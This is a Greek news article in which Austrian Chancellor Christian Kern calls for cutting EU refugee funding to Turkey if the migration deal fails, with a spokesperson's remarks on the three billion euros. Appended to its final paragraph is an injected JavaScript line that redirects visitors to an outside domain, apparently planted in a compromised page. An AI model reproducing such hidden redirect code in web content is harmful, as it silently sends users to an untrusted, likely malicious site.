Κερν: Να κλείσει η στρόφιγγα χρημάτων προς την Τουρκία

0
8

 

«Να κλείσει η στρόφιγγα των χρημάτων προς την Τουρκία» σε περίπτωση αποτυχίας της Συμφωνίας για το Προσφυγικό, δήλωσε σε συνέντευξη του στην «Kronen Zeitung» ο ομοσπονδιακός καγκελάριος της Αυστρίας Κρίστιαν Κερν.

Όπως επεσήμανε ο κ. Κερν, η τουρκική κυβέρνηση αναζητεί «συνειδητά την όξυνση» στην τακτική της και σημείωσε πως θα πρέπει να ισχύσει ότι «εάν δεν υπάρχει συμφωνία, δεν υπάρχουν και χρήματα».

Σύμφωνα με διευκρινίσεις της εκπροσώπου του καγκελάριου στο Αυστριακό Πρακτορείο Ειδήσεων (ΑΡΑ), οι δηλώσεις του Κρίστιαν Κερν αφορούν το ποσό των τριών δισεκατομμυρίων ευρώ που έχουν αποφασιστεί από την Ευρωπαική Ενωση στο πλαίσιο της Συμφωνίας για την υποστήριξη προσφύγων στην Τουρκία.

Στην ερώτηση, τι σημαίνει η διαγραφή των 2,5 δισεκατομμυρίων ευρώ που δεν έχουν καταβληθεί έως τώρα για τους επί τόπου πρόσφυγες, η εκπρόσωπος επεσήμανε πως «αυτή την ερώτηση θα πρέπει να θέσει στον εαυτό της, πρώτα από όλους η Τουρκία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here